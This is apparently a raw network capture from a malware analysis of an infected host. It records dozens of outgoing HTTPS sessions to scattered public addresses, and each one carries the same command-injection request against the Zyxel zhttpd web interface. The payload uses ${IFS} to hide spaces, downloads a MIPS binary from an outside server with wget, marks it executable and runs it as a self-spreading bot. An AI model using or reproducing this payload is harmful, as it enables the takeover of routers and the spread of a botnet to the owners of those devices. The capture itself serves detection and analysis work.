                                                        Jan 28, 2024 10:12:52.400563955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4326192.168.2.1443412160.248.177.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400563955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4327192.168.2.1451512219.187.130.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400595903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4328192.168.2.145125453.218.65.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400598049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4329192.168.2.1447176151.0.47.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400595903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4330192.168.2.1433122193.173.175.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400598049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4331192.168.2.1459302154.156.236.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400602102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4332192.168.2.1450468116.34.44.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400619984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4333192.168.2.144703494.210.235.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400619984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4334192.168.2.1439170183.101.126.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400722980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4335192.168.2.145431253.220.21.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400760889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4336192.168.2.1453058208.49.47.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400791883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4337192.168.2.1459086139.194.116.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400826931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4338192.168.2.1446530188.210.84.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400866985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4339192.168.2.144294013.51.23.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400907993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4340192.168.2.1449180128.200.53.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400959969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4341192.168.2.1450648163.5.66.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401007891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4342192.168.2.1451354222.58.233.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401053905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4343192.168.2.1455698207.159.75.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401067019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4344192.168.2.143578499.168.190.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401127100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4345192.168.2.143364052.123.174.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401159048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4346192.168.2.14480962.195.180.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401199102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4347192.168.2.1458360137.212.157.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401242018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4348192.168.2.1448888159.30.12.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401295900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4349192.168.2.1436778168.2.0.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401331902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4350192.168.2.14376802.229.245.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401359081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4351192.168.2.1442910150.59.63.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401411057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4352192.168.2.1443176129.229.218.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401432037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4353192.168.2.1454494115.16.178.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401472092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4354192.168.2.144919864.181.75.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401489973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4355192.168.2.143328874.26.179.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401544094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4356192.168.2.1459892146.23.148.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401582956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4357192.168.2.1460900160.215.20.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401607990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4358192.168.2.144231470.222.252.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401675940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4359192.168.2.1436144161.91.117.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401716948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4360192.168.2.1457588108.37.27.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401745081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4361192.168.2.1458412122.168.196.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401797056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4362192.168.2.1440440181.69.229.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401838064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4363192.168.2.1449880157.137.179.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401839018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4364192.168.2.1440262217.239.214.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401871920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4365192.168.2.145663214.207.32.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401905060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4366192.168.2.1460362171.226.14.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401963949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4367192.168.2.1452604193.111.107.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.401995897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4368192.168.2.145743875.181.58.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402054071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4369192.168.2.1437542205.100.76.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402089119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4370192.168.2.1439094192.220.151.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402127028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4371192.168.2.1455712162.222.145.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402160883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4372192.168.2.1455442218.77.229.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402195930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4373192.168.2.145941688.121.216.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402228117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4374192.168.2.1436856142.213.179.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402262926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4375192.168.2.1458134188.150.69.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402296066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4376192.168.2.145824618.53.138.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402329922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4377192.168.2.14432764.24.131.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402367115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4378192.168.2.143767869.239.193.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402403116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4379192.168.2.1440618176.173.130.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402441025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4380192.168.2.144496698.14.188.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402486086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4381192.168.2.143497878.253.124.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402497053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4382192.168.2.1450884208.251.99.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402575970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4383192.168.2.143678859.63.235.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402591944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4384192.168.2.144379084.156.80.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402646065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4385192.168.2.145843293.39.164.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.402679920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4386192.168.2.145869867.114.68.199443
                                                        TimestampBytes transferredDirectionData
